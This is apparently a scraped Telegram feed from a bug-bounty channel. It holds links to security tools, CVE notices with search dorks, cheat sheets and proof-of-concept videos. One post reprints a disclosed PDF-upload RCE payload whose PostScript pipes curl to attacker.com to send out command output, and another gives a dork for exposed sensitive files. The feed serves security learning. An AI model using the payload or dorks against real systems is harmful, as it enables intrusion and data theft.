NEW BOT Телеграм, страница

https://solodit.cyfrin.io/

All disclosed web3 protocols vulnerability reports with filters (like Hacktivity)

Smart Contract Vulnerability Dataset - Cyfrin Solodit

Explore the world’s largest data set of smart contract vulnerabilities, findings, and mitigations. Strengthen protocol and dApp security, research bugs before deployment.

🔥11👍2

3.65K viewsMr Rahim, 12:54

Brut Security

🗿17

3.32K views14:38

Brut Security

👍14

3.37K views17:25

Brut Security

Does anyone have Aura+ Songs Playlist ? Do Drop in Comments! Thank You.

🤨4🗿4

3.17K views06:46

Brut Security

☄️RCE On PDF Upload: https://hackerone.com/reports/403417

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit

Please open Telegram to view this post

VIEW IN TELEGRAM

HackerOne

Semrush disclosed on HackerOne: Remote Code Execution on...

The Logo upload in the report constructor at: https://www.semrush.com/my_reports/constructor

{F340480}

is passed through a not properly patched version of ImageMagick. You can use Postnoscript to...

🔥8👍1

3.42K viewsedited 07:26

Brut Security

⚡WayBackup Finder - A passive way to find backups/ sensitive information.
⚠️https://github.com/anmolksachan/WayBackupFinder

Please open Telegram to view this post

VIEW IN TELEGRAM

👍9❤1

3.73K viewsedited 07:30

Brut Security

A Visual Guide to Recon

🔥5👍1

3.18K viewsedited 09:13

Brut Security

CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating 🔥

An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.

Search at Netlas.io:
👉 Link: https://nt.ls/6EpWK
👉 Dork: protocol:t3 OR protocol:t3s

Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW

👍6🫡1

3.26K views10:59

Brut Security

https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique

PortSwigger Research

Stealing HttpOnly cookies with the cookie sandwich technique

In this post, I will introduce the "cookie sandwich" technique which lets you bypass the HttpOnly flag on certain servers. This research follows on from Bypassing WAFs with the phantom $Version cookie

👍2

3.22K views17:45

Brut Security

☄️HExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

⚠️https://github.com/c0dejump/HExHTTP

Please open Telegram to view this post

VIEW IN TELEGRAM

👍11🔥5❤3

3.66K viewsedited 19:17

Brut Security

▶️Explore Bug Bounty POC Videos: https://news.1rj.ru/str/brutsecurity_poc

Please open Telegram to view this post

VIEW IN TELEGRAM

3.38K views20:34

Brut Security

Brut Security pinned «▶️Explore Bug Bounty POC Videos: https://news.1rj.ru/str/brutsecurity_poc»

20:34

Brut Security

👍8❤2

3.68K views05:47

Brut Security

☄️IDOR Cheat Sheet
▶️

https://jasper-join-7e5.notion.site/IDOR-Cheat-Sheet-9f7c9e3285bf4c7cae5ea38243cd0391

Please open Telegram to view this post

VIEW IN TELEGRAM

jasper-join-7e5 on Notion

IDOR Cheat Sheet | Notion

What if I told you that there is a web application vulnerability so simple to exploit, that it could make bug hunting feel like a breeze?

👍12🔥2❤1

3.95K views07:10

Brut Security

New Business Logic POC Video Shared -https://news.1rj.ru/str/brutsecurity_poc/9

🔥4❤1

3.05K views07:29

Brut Security

CVE-2025-0314 and other: Multiple vulnerabilities in GitLab, 4.3 - 8.7 rating❗️

In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.

Search at Netlas.io:
👉 Link: https://nt.ls/BNKS8
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/

🤝4

3.33K views09:24

Brut Security

☄️Information Disclosure Dork☄️

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Please open Telegram to view this post

VIEW IN TELEGRAM

👍16🔥13❤1

3.62K viewsedited 09:59

Brut Security

▶️Automated JS Endpoint Extraction and Verification with HTTPX and GAU

echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,noscript \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javanoscript|text/javanoscript" \
| jq -r '.extracts[]' | tr -d '[],'

Please open Telegram to view this post

VIEW IN TELEGRAM

❤20🔥16🐳1

3.71K viewsedited 10:56

Brut Security

Where is the reaction guys? It's a good way to support the channel, so please do leave your reaction to grow this community. Thanks!

⚠️Join Our Discussion Group - https://news.1rj.ru/str/brutsec

Please open Telegram to view this post

VIEW IN TELEGRAM

Discussion

Community Discussion

❤16🐳10🔥5

2.91K viewsedited 11:03

Brut Security

⚡Ultimate FFUF Cheat Sheet!

🔗

https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150

❤16🔥3👨‍💻1

3.75K views11:09

Brut Security